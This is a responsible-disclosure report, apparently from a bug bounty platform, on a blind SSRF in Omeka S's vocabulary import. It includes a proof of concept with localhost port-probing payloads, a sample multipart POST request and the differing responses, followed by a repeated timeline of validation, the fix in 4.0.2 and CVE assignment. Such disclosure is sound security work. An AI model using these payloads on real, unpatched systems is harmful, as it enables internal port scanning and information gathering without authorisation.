Server Side Request Forgery (SSRF) in omeka/omeka-s

Valid

Reported on

Jul 16th 2023

Description

There is Blind SSRF on the vocabulary screen in the administrator screen.

Proof of Concept

Step 1. Log in to the administrator screen and access "Import new vocabulary" from the "vocabulary" page.
Step 2. Specify the following Payload in the "Vocabulary URL" field and check that the local environment can be accessed from the response result. (File format: JSON-LD)

Payload

Open Port

http://localhost:80

Open Port

http://localhost:443

Closed Port

http://localhost:1234

Request

POST /admin/vocabulary/import HTTP/1.1
 ...

-----------------------------28807843559236410972421406436
Content-Disposition: form-data; name="vocabulary-file[url]"

http://localhost:80
-----------------------------28807843559236410972421406436
Content-Disposition: form-data; name="vocabulary-file[format]"

jsonld
-----------------------------28807843559236410972421406436
 ...

Response Result

Open Port

Unable to load the remote document "<!DOCTYPE html  ...

Closed Port

Unable to connect to localhost:1234 (Connection refused)

PoC Video

https://drive.google.com/file/d/10SmI9dtRewubES4kRHHk2xyupG_GxLF5/view?usp=sharing

Impact

It is possible to perform a port scan against the host's local environment.
Also, sensitive information in the local environment may be obtained.

References

We are processing your report and will contact the omeka/omeka-s team within 24 hours. 5 months ago

morioka12 modified the report

5 months ago

morioka12 modified the report

5 months ago

morioka12 modified the report

5 months ago

We have contacted a member of the omeka/omeka-s team and are waiting to hear back 4 months ago

A omeka/omeka-s maintainer has acknowledged this report 4 months ago

morioka12

commented 4 months ago

Researcher

Thank you for reviewing and approving my report. I will continue to wait for requests for fixes and CVEs.

John Flatness validated this vulnerability 4 months ago

morioka12 has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

morioka12

commented 4 months ago

Researcher

@zerocrates Thanks for the fix and pull merge. Could you please submit a corrected mark and CVE assignment request?

John Flatness marked this as fixed in 4.0.2 with commit dc01ca 4 months ago

The fix bounty has been dropped

This vulnerability has been assigned a CVE

John Flatness published this vulnerability 4 months ago

to join this conversation

We are processing your report and will contact the omeka/omeka-s team within 24 hours. 5 months ago

morioka12 modified the report

5 months ago

morioka12 modified the report

5 months ago

morioka12 modified the report

5 months ago

We have contacted a member of the omeka/omeka-s team and are waiting to hear back 4 months ago

A omeka/omeka-s maintainer has acknowledged this report 4 months ago

morioka12

commented 4 months ago

Researcher

Thank you for reviewing and approving my report. I will continue to wait for requests for fixes and CVEs.

John Flatness validated this vulnerability 4 months ago

morioka12 has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

morioka12

commented 4 months ago

Researcher

@zerocrates Thanks for the fix and pull merge. Could you please submit a corrected mark and CVE assignment request?

John Flatness marked this as fixed in 4.0.2 with commit dc01ca 4 months ago

The fix bounty has been dropped

This vulnerability has been assigned a CVE

John Flatness published this vulnerability 4 months ago

to join this conversation